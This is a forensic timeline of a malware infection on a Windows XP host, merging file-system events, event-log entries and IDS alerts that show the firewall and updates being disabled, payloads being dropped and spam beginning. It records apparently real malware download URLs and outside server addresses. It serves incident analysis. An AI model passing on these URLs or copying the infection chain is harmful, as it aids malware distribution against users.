02/19/09 10:03:10 the firewall has stopped, the CcEvtSvc service starts...02/19/09 10:03:10 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Windows Firewall/Internet Connection Sharing (ICS) service entered the stopped state. -02/19/09 10:03:10 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Windows Firewall/Internet Connection Sharing (ICS) service was successfully sent a stop control. -02/19/09 10:03:13 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The CcEvtSvc service was successfully sent a start control. -02/19/09 10:03:13 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The CcEvtSvc service entered the running state. -02/19/09 10:03:14 created abb[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\QXLU2P44\abb[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:03:14 created services.exe C:\\WINDOWS\services.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:03:14 modified netsh.exe C:\\WINDOWS\SYSTEM32\netsh.exe Windows Executable Code\Executable File, Archive02/19/09 10:03:16 accessed abb[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\QXLU2P44\abb[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:03:16 modified abb[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\QXLU2P44\abb[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:03:16 written abb[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\QXLU2P44\abb[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:03:17 bro application/x-dosexec GET http://thaexp.cn/dll/abb.txt02/19/09 10:03:17 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=2293/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/dll/abb.txt msg=application/x-dosexec\ GET\ http://thaexp.cn/dll/abb.txt tag=@83-10576-60436502/19/09 10:03:17 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:03:17 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:03:17 created 147.tmp C:\\WINDOWS\SYSTEM32\147.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:03:17 created reader_s.exe C:\\WINDOWS\SYSTEM32\reader_s.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:03:17 written reader_s.exe C:\\WINDOWS\SYSTEM32\reader_s.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:03:18 created reader_s.exe C:\\Documents and Settings\smith.99999\reader_s.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:03:18 written reader_s.exe C:\\Documents and Settings\smith.99999\reader_s.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:03:23 created al[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\al[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:03:24 accessed al[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\al[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:03:24 created 148.tmp C:\\WINDOWS\SYSTEM32\148.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:03:24 created index[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\index[1] * Executable File, Archive, Not Indexed02/19/09 10:03:24 modified 147.tmp C:\\WINDOWS\SYSTEM32\147.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:03:24 modified al[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\al[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:03:24 written 147.tmp C:\\WINDOWS\SYSTEM32\147.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:03:24 written al[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\al[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:03:25 accessed index[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\index[1] * Executable File, Archive, Not Indexed02/19/09 10:03:25 created doc[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\doc[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:03:25 created pydesepr.dll C:\\WINDOWS\SYSTEM32\pydesepr.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:03:25 modified index[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\index[1] * Executable File, Archive, Not Indexed02/19/09 10:03:25 written index[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\index[1] * Executable File, Archive, Not Indexed02/19/09 10:03:25 written jdfjpl.dll C:\\WINDOWS\SYSTEM32\jdfjpl.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:03:25 written pydesepr.dll C:\\WINDOWS\SYSTEM32\pydesepr.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:03:26 bro application/x-dosexec GET http://thaexp.cn/dll/al.txt02/19/09 10:03:26 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=2293/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/dll/al.txt msg=application/x-dosexec\ GET\ http://thaexp.cn/dll/al.txt tag=@83-10576-60436502/19/09 10:03:26 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:03:26 modified jdfjpl.dll C:\\WINDOWS\SYSTEM32\jdfjpl.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:03:26 modified pydesepr.dll C:\\WINDOWS\SYSTEM32\pydesepr.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:03:27 bro application/x-dosexec GET http://85.17.169.55/forum/index.dll?setid=irq4&affid=177047&uid=2C211880FE9611DD818B177047CFFFFF&rid=pfobnf&guid=D294B3372EFC4D4CA6C6DDD12F79C20A02/19/09 10:03:27 created jdfjpl.dll C:\\WINDOWS\SYSTEM32\jdfjpl.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:03:28 bro MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bitGET http://lorentil.cn/dok/doc.txt
02/19/09 10:03:30 automatic updates have been disabled...02/19/09 10:03:31 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Automatic Updates service was successfully sent a stop control. -02/19/09 10:03:39 accessed UNWISE.EXE C:\\Program Files\AWS\WeatherBug\UNWISE.EXE Windows Executable Code\Executable File, Archive02/19/09 10:03:39 modified UNWISE.EXE C:\\Program Files\AWS\WeatherBug\UNWISE.EXE Windows Executable Code\Executable File, Archive02/19/09 10:03:46 accessed WUAUCLT.EXE-1360D60A.pf C:\WINDOWS\Prefetch\WUAUCLT.EXE-1360D60A.pf02/19/09 10:03:46 written WUAUCLT.EXE-1360D60A.pf C:\WINDOWS\Prefetch\WUAUCLT.EXE-1360D60A.pf02/19/09 10:03:46 modified WUAUCLT.EXE-1360D60A.pf C:\WINDOWS\Prefetch\WUAUCLT.EXE-1360D60A.pf02/19/09 10:03:49 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Automatic Updates service entered the stopped state. -02/19/09 10:04:59 created system@coupons[1].txt coupons.com/ Cookies -02/19/09 10:05:06 created system@google[1].txt google.com/ Cookies -02/19/09 10:05:08 bro no=ProtocolFound na=NOTICE_FILE es=node03.1 sa=164.107.xxx.177 sp=2335/tcp da=216.195.58.113 dp=2085/tcp num=16 msg=164.107.xxx.177/2335\ >\ 216.195.58.113/2085\ Apache\ (via\ HTTP)\ on\ port\ 2085/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-60837302/19/09 10:05:08 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=2336/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/2336\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-60837902/19/09 10:05:17 bro no=ProtocolFound na=NOTICE_FILE es=node07 sa=164.107.xxx.177 sp=2348/tcp da=216.195.57.253 dp=4658/tcp num=16 msg=164.107.xxx.177/2348\ >\ 216.195.57.253/4658\ Apache\ (via\ HTTP)\ on\ port\ 4658/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-60852e02/19/09 10:05:28 created [email protected][2].txt m.webtrends.com/ Cookies -02/19/09 10:05:28 created [email protected][1].txt signup.live.com/ Cookies -02/19/09 10:05:28 created [email protected][2].txt www.upononjob.cn/ Cookies -02/19/09 10:05:31 modified msmsgs.exe C:\\Program Files\Messenger\msmsgs.exe Windows Executable Code\Executable File, Archive02/19/09 10:05:45 accessed [email protected][2].txt m.webtrends.com/ Cookies -02/19/09 10:05:57 created upd105320[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\X5RWIZXC\upd105320[1] * Executable File, Archive, Not Indexed02/19/09 10:05:57 created vgyixcnu.dll C:\\WINDOWS\SYSTEM32\vgyixcnu.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:05:58 accessed upd105320[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\X5RWIZXC\upd105320[1] * Executable File, Archive, Not Indexed02/19/09 10:05:58 modified upd105320[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\X5RWIZXC\upd105320[1] * Executable File, Archive, Not Indexed02/19/09 10:05:58 modified vgyixcnu.dll C:\\WINDOWS\SYSTEM32\vgyixcnu.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:05:58 written upd105320[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\X5RWIZXC\upd105320[1] * Executable File, Archive, Not Indexed02/19/09 10:05:58 written vgyixcnu.dll C:\\WINDOWS\SYSTEM32\vgyixcnu.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:06:00 bro application/x-dosexec GET http://77.93.75.147/db/upd105320.dll?setid=irq4&affid=177047&uid=2C211880FE9611DD818B177047CFFFFF&guid=D294B3372EFC4D4CA6C6DDD12F79C20A&rid=pfobnf02/19/09 10:06:07 accessed doc[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\doc[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:06:07 modified 148.tmp C:\\WINDOWS\SYSTEM32\148.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:06:07 modified doc[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\doc[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:06:07 written 148.tmp C:\\WINDOWS\SYSTEM32\148.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:06:07 written doc[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\doc[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:06:12 accessed lgsztotz.exe C:\\WINDOWS\lgsztotz.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:06:12 created lgsztotz.exe C:\\WINDOWS\lgsztotz.exe Windows Executable Code\Executable Match File, Archive
![Page 13: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/13.jpg)
02/19/09 10:06:12 created uncxiygv.ini C:\\WINDOWS\SYSTEM32\uncxiygv.ini Initialization Windows ! Bad signature File, Hidden, System02/19/09 10:06:12 modified lgsztotz.exe C:\\WINDOWS\lgsztotz.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:06:12 written lgsztotz.exe C:\\WINDOWS\lgsztotz.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:06:19 accessed [email protected][2].txt www.upononjob.cn/ Cookies -02/19/09 10:06:22 modified uncxiygv.ini C:\\WINDOWS\SYSTEM32\uncxiygv.ini Initialization Windows ! Bad signature File, Hidden, System02/19/09 10:06:22 written uncxiygv.ini C:\\WINDOWS\SYSTEM32\uncxiygv.ini Initialization Windows ! Bad signature File, Hidden, System
02/19/09 10:16:11 system reboots (after a crash?)02/19/09 10:16:12 logged SysEvent.Evt EVENT ID: 9 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Broadcom 440x 10/100 Integrated Controller: Network controller configured for 100Mb full-duplex link. -02/19/09 10:16:19 accessed SbClientManager.exe C:\\Program Files\SafeBoot\SbClientManager.exe Windows Executable Code\Executable File, Archive02/19/09 10:16:19 accessed mdm.exe C:\\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe Windows Executable Code\Executable File, Archive02/19/09 10:16:35 logged SysEvent.Evt EVENT ID: 6009 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Microsoft (R) Windows (R) 5.01. 2600 Service Pack 3 Uniprocessor Free. -02/19/09 10:16:35 logged SysEvent.Evt EVENT ID: 6005 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was started. -02/19/09 10:16:36 logged SysEvent.Evt EVENT ID: 1001 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The computer has rebooted from a bugcheck. The bugcheck was:;0x1000007e (0xc0000005, 0x8239c12a, 0xb829aaf4, 0xb829a7f0).;A dump was saved in: C:\WINDOWS\Minidump\Mini021909-01.dmp. -02/19/09 10:17:05 created ethqqaeg.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ethqqaeg.sys Device Driver Code\Executable Match File, Archive02/19/09 10:17:05 modified ethqqaeg.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ethqqaeg.sys Device Driver Code\Executable Match File, Archive02/19/09 10:17:05 written ethqqaeg.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ethqqaeg.sys Device Driver Code\Executable Match File, Archive02/19/09 10:17:11 modified SbClientManager.exe C:\\Program Files\SafeBoot\SbClientManager.exe Windows Executable Code\Executable File, Archive02/19/09 10:17:19 bro no=ProtocolFound na=NOTICE_FILE es=node02.0 sa=164.107.xxx.177 sp=1049/tcp da=94.76.216.202 dp=9011/tcp num=16 msg=164.107.xxx.177/1049\ >\ 94.76.216.202/9011\ Apache\ (via\ HTTP)\ on\ port\ 9011/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-61d02b02/19/09 10:17:25 modified mdm.exe C:\\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe Windows Executable Code\Executable File, Archive02/19/09 10:17:34 bro no=ProtocolFound na=NOTICE_FILE es=node02.0 sa=164.107.xxx.177 sp=1078/tcp da=94.76.216.202 dp=9011/tcp num=16 msg=164.107.xxx.177/1078\ >\ 94.76.216.202/9011\ Apache\ (via\ HTTP)\ on\ port\ 9011/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-61d446
02/19/09 10:17:45 spam starts...02/19/09 10:17:47 logged SysEvent.Evt EVENT ID: 11162 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The system failed to register host (A) resource records (RRs) for;network adapterwith settings:; Adapter Name : {A45FF4F5-BE0B-4156-B8E8-7CFCB02CE985}; Host Name : hackedpc; Primary Domain Suffix : ubw.ohio-state.edu; DNS server list :; 164.107.xxx.29, 128.146.1.7, 128.146.48.7; Sent update to server : 164.1.1.1; IP Address(es) :; 164.107.xxx.177;The reason the system could not register these RRs was because the;update request it sent to the DNS server timed out. The most likely;cause of this is that the DNS server authoritative for the name it;was attempting to register or update is not running at this time.;You can manually retry DNS registration of the network adapter and;its settings by typing "ipconfig /registerdns" at the command prompt.;If problems still persist, contact your DNS server or network systems;administrator.-02/19/09 10:17:52 modified acrodist.exe C:\\Program Files\Adobe\Acrobat 7.0\Distillr\acrodist.exe Windows Executable Code\Executable File, Archive02/19/09 10:17:52 modified fxssvc.exe C:\\WINDOWS\SYSTEM32\fxssvc.exe Windows Executable Code\Executable File, Archive02/19/09 10:17:58 modified agent.exe C:\\Program Files\Common Files\InstallShield\UpdateService\agent.exe Windows Executable Code\Executable File, Archive02/19/09 10:18:16 modified xccwinsys.ini C:\\WINDOWS\xccwinsys.ini Initialization Windows ! Bad signature File, Archive02/19/09 10:18:16 written xccwinsys.ini C:\\WINDOWS\xccwinsys.ini Initialization Windows ! Bad signature File, Archive
02/19/09 10:18:52 huh...02/19/09 10:18:53 logged SysEvent.Evt EVENT ID: 4226 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: TCP/IP has reached the security limit imposed on the number of concurrent TCP connect attempts. -02/19/09 10:19:00 logged SysEvent.Evt EVENT ID: 10010 EVENT TYPE: ERROR EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The server {0002DF01-0000-0000-C000-000000000046} did not register with DCOM within the required timeout. -02/19/09 10:19:14 modified dumprep.exe C:\\WINDOWS\SYSTEM32\dumprep.exe Windows Executable Code\Executable File, Archive02/19/09 10:19:47 created system@atdmt[1].txt atdmt.com/ Cookies -02/19/09 10:19:47 created system@google[1].txt google.com/ Cookies -02/19/09 10:19:47 created system@live[2].txt live.com/ Cookies -02/19/09 10:19:47 created [email protected][1].txtmsnaccountservices.112.2o7.net/ Cookies -02/19/09 10:19:47 created system@yahoo[1].txt yahoo.com/ Cookies -02/19/09 10:19:47 created [email protected][1].txt 66.48.78.222/ron/ Cookies -02/19/09 10:19:47 created [email protected][1].txthotelinternetstrategies.122.2o7.net/ Cookies -02/19/09 10:19:47 created smith.99999@lacasaquecanta[2].txtlacasaquecanta.com/ Cookies -02/19/09 10:19:47 created smith.99999@weatherbug[1].txt weatherbug.com/ Cookies -02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7026 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The following boot-start or system-start driver(s) failed to load: ;irzylwcf;zmzfozjg -02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service was successfully sent a start control. -02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service was successfully sent a start control. -02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service entered the running state. -02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service was successfully sent a start control. -02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Connections service was successfully sent a start control. -02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service entered the running state. -02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Connections service entered the running state. -02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service was successfully sent a start control. -02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service entered the running state. -02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service entered the running state. -02/19/09 10:20:04 bro no=ProtocolFound na=NOTICE_FILE es=node03.1 sa=164.107.xxx.177 sp=2482/tcp da=216.195.58.113 dp=2085/tcp num=16 msg=164.107.xxx.177/2482\ >\ 216.195.58.113/2085\ Apache\ (via\ HTTP)\ on\ port\ 2085/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-6218f102/19/09 10:20:05 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=2484/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/2484\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-62196702/19/09 10:20:27 modified userinit.exe C:\\WINDOWS\SYSTEM32\userinit.exe Windows Executable Code\Executable File, Archive02/19/09 10:20:43 accessed ojaocbok.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ojaocbok.sys Device Driver Code\Executable Match File, Archive02/19/09 10:20:45 accessed phqghume.sys C:\\WINDOWS\SYSTEM32\DRIVERS\phqghume.sys Device Driver Code\Executable Match File, Archive02/19/09 10:20:51 bro
02/19/09 10:20:58 logged SysEvent.Evt EVENT ID: 1003 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Error code 1000007e, parameter1 c0000005, parameter2 8239c12a, parameter3 b829aaf4, parameter4 b829a7f0. -02/19/09 10:20:59 modified dwwin.exe C:\\WINDOWS\SYSTEM32\dwwin.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:21:10 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/17421@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=21.20&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=170&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=21.20&WO3=0&WO4=58.00&Z3=43204&History\Daily -02/19/09 10:21:13 bro application/x-dosexec GET http://thaexp.cn/dll/al.txt02/19/09 10:21:13 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=3425/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/dll/al.txt msg=application/x-dosexec\ GET\ http://thaexp.cn/dll/al.txt tag=@83-10576-6237d802/19/09 10:21:17 accessed index.dat http://deskwx.weatherbug.com/WeatherWindow/WeatherWindow.html?lvl=0&zip=43204&con1=111&sunr=1235045940&suns=1235085120&ut=1235056857&stat=KTZR&L1=535&ver=6.07&camera_id=&ccamzip=<a=<at=<az=&sed=0&lpt=1235048003&rnd=12382&&&&vcw=452&lvw=1210334133&lvd=1209989319&dosp=0&UA1=506&UA5=506&zcode=Z5264&showgutsads=1&screen_x=1152&screen_y=804&lvr=&lvu=&wpt=&A2=170&lvh=&wat=1235055111&A1=50500&dsr=506&dsu=506&dssp=-1&dspm=-1&pmls=1234184569&D3=3&UA3=-1&UA11=&UA15=&L4=23&UA16=&ui=1&n=506267455&alid=0&u=&LRR=&L3=OHHistory\Daily -02/19/09 10:21:22 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/18716@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=21.20&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=170&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=21.20&WO3=0&WO4=58.00&Z3=43204&History\Daily -02/19/09 10:21:25 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The DSproct service was successfully sent a start control. -02/19/09 10:21:37 modified senekaklpapjct.dat C:\\WINDOWS\SYSTEM32\senekaklpapjct.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive02/19/09 10:21:37 written senekaklpapjct.dat C:\\WINDOWS\SYSTEM32\senekaklpapjct.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive02/19/09 10:21:49 accessed index.dat :Host: 66.48.78.222 History\Daily -02/19/09 10:21:49 accessed index.dat http://66.48.78.222/ron/ronz.php?sid=&numpop=2&nid=1535187396&mid=8640037421&servern=&rurl=http://popunder.adsrevenue.net/linksed.php?sn=1781235056906&uip=164.107.xxx.177&siteid=Sniper34&clater=1&serverfile=popnetwork&ref=http%3A%2F%2Fklite.ath.cx%2F&clicksor=&unsold=0&data=rSe_2%CA%D1%D3%CE%CA%D0%D3%D1%CD%D4%C7%28%24rOa%5E2%EC%2A%26%26%7B%2A%D0%CC%C3.3%FA%24b%27%2B%2C%27%C9%D0%C6%FA%FE%2B%23%FC%DA%F3%F4%E7%E4D%FE%7Dn%5D%7E%2F%E1%FD%2A%2C3%25%7E%DB%D1%BE%2BsLIoV%22%251%2F%D7%D1%C3%F9%7D.%F2%2A%7BjSls2%CC%C52%24%2A%27%26%FC%DA%CE&url=http%3A%2F%2F64.246.15.27%2Fron%2Fblank.phpHistory\Daily -02/19/09 10:21:54 accessed index.dat http://66.48.78.222/ron/ronz.php?sid=&numpop=2&nid=1535187396&mid=8640037463&servern=&rurl=http://popunder.adsrevenue.net/linksed.php?sn=1781235056912&uip=164.107.xxx.177&siteid=Sniper34&clater=1&serverfile=popnetwork&ref=http%3A%2F%2Fklite.ath.cx%2F&clicksor=&unsold=0&data=rSe_2%CA%D1%D3%CE%CA%D0%D3%D1%CE%D0%C7%29+rOa%5E2%EC%2A%26%26%7B%2A%D0%CC%C3.3%FB+b%27%2B%2C%27%C9%D0%C6%FA%FE%2B%23%FC%DA%F3%F4%E8%E0D%FE%7Dn%5D%7E%2F%E1%FD%2A%2C3%25%7E%DB%D1%BF%27sLIoV%22%251%2F%D7%D1%C3%F9%7D.%F2%2B%FBjSls2%CC%C52%24%2A%27%26%FC%DA%CE&url=http%3A%2F%2F64.246.15.27%2Fron%2Fblank.phpHistory\Daily -02/19/09 10:22:35 accessed index.dat 